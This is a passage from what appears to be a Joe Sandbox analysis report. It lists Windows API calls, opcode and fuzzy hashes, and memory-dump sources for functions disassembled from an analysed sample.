                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                              • String ID: \VH
                                                                                              • API String ID: 1682464887-234962358
                                                                                              • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                              • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                              • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                              • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                              • String ID: \VH
                                                                                              • API String ID: 1682464887-234962358
                                                                                              • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                              • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                              • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                              • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                              • String ID: \VH
                                                                                              • API String ID: 1682464887-234962358
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D37E
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D55C
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
• SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CLSIDFromString.OLE32(?,00000000), ref: 00435236
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
• String ID: crts
• API String ID: 943502515-3724388283
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
• SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
• SetErrorMode.KERNEL32(?), ref: 0045D35C
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ErrorMode$LabelVolume
• String ID: \VH
• API String ID: 2006950084-234962358
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetMenuItemInfoW.USER32 ref: 00449727
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
• DrawMenuBar.USER32 ref: 00449761
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: Menu$InfoItem$Draw_malloc
• String ID: 0
• API String ID: 772068139-4108050209
APIs
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: _wcslen$_wcscpy
• String ID: 3, 3, 8, 1
• API String ID: 3469035223-357260408
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
• GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCloseHandle
• API String ID: 2574300362-3530519716
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: ICMP.DLL$IcmpCreateFile
                                                                                              • API String ID: 2574300362-275556492
                                                                                              • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                              • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                              • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                              • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                              • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: ICMP.DLL$IcmpSendEcho
                                                                                              • API String ID: 2574300362-58917771
                                                                                              • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                              • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                              • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                              • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                              • API String ID: 2574300362-4033151799
                                                                                              • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                              • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                              • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                              • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                              • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                              Similarity
                                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                                              • String ID:
                                                                                              • API String ID: 2808897238-0
                                                                                              • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                              • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                              • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                              • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                              • __itow.LIBCMT ref: 004699CD
                                                                                                • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                              • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                              • __itow.LIBCMT ref: 00469A97
                                                                                              Similarity
                                                                                              • API ID: MessageSend$__itow
                                                                                              • String ID:
                                                                                              • API String ID: 3379773720-0
                                                                                              • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                              • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                              • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                              • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                              • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                              Similarity
                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                              • String ID:
                                                                                              • API String ID: 3880355969-0
                                                                                              • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                              • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                              • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                              • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2782032738-0
                                                                                              • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                              • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                              • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                              • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                              APIs
                                                                                              • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                              • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                              • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                              • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                              Similarity
                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1352109105-0
                                                                                              • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                              • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                              • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                              • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                              APIs
                                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                              Similarity
                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 3321077145-0
                                                                                              • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                              • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                              • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                              • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                              • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                              • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                              • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                              • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 004503C8
                                                                                              • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                              • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                              • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Proc$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 2351499541-0
                                                                                              • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                              • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                              • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                              • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                              • TranslateMessage.USER32(?), ref: 00442B01
                                                                                              • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$DispatchTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1795658109-0
                                                                                              • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                              • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                              • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                              • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                              • GetCaretPos.USER32(?), ref: 004743B2
                                                                                              • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                              • GetForegroundWindow.USER32 ref: 004743EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                              • String ID:
                                                                                              • API String ID: 2759813231-0
                                                                                              • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                              • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                              • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                              • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                              APIs
                                                                                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                              • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                              • _wcslen.LIBCMT ref: 00449519
                                                                                              • _wcslen.LIBCMT ref: 00449526
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend_wcslen$_wcspbrk
                                                                                              • String ID:
                                                                                              • API String ID: 2886238975-0
                                                                                              • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                              • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                              • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                              • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __setmode$DebugOutputString_fprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1792727568-0
                                                                                              • Opcode ID: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                                                              • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                              • Opcode Fuzzy Hash: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                                                              • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                              APIs
                                                                                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                              • String ID:
                                                                                              • API String ID: 2169480361-0
                                                                                              • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                              • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                              • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                              • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                              APIs
                                                                                                • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
